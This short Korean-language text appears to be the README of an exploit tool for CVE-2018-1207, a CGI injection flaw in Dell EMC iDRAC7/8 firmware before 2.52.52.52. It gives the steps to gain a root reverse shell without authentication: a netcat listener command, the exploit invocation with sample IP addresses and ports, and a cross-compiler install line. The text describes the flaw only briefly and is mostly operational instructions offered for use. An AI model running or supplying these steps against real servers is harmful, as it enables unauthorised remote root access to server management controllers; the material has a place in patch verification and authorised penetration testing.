
iDRAC 7 & 8 펌웨어 < 2.52.52.52 익스플로잇
익스플로잇 iDRAC 7 & 8 펌웨어 < 2.52.52.52
Dell EMC iDRAC7/iDRAC8의 2.52.52.52 이전 버전에는 원격 코드 실행에 사용될 수 있는 CGI 인젝션 취약점이 존재합니다. 원격의 인증되지 않은 공격자는 CGI 변수를 사용하여 원격 코드를 실행할 수 있습니다.
이 코드는 iDRAC 서비스가 root 사용자로 리버스 셸을 열도록 합니다.
로컬 리스너를 시작하십시오: nc -v -l -p local_port
nc -v -l -p 5500
익스플로잇을 실행하십시오: python ./cve-2018-1207.py remote_host remote_port local_host local_port
python ./cve-2018-1207.py 192.168.1.10 443 192.168.1.200 5500
sh4-linux-gnu-gcc 버전이 설치되어 있어야 하며, 현재 버전은 sh4-linux-gnu-gcc-11입니다.
apt install gcc-11-sh4-linux-gnu로 설치할 수 있습니다.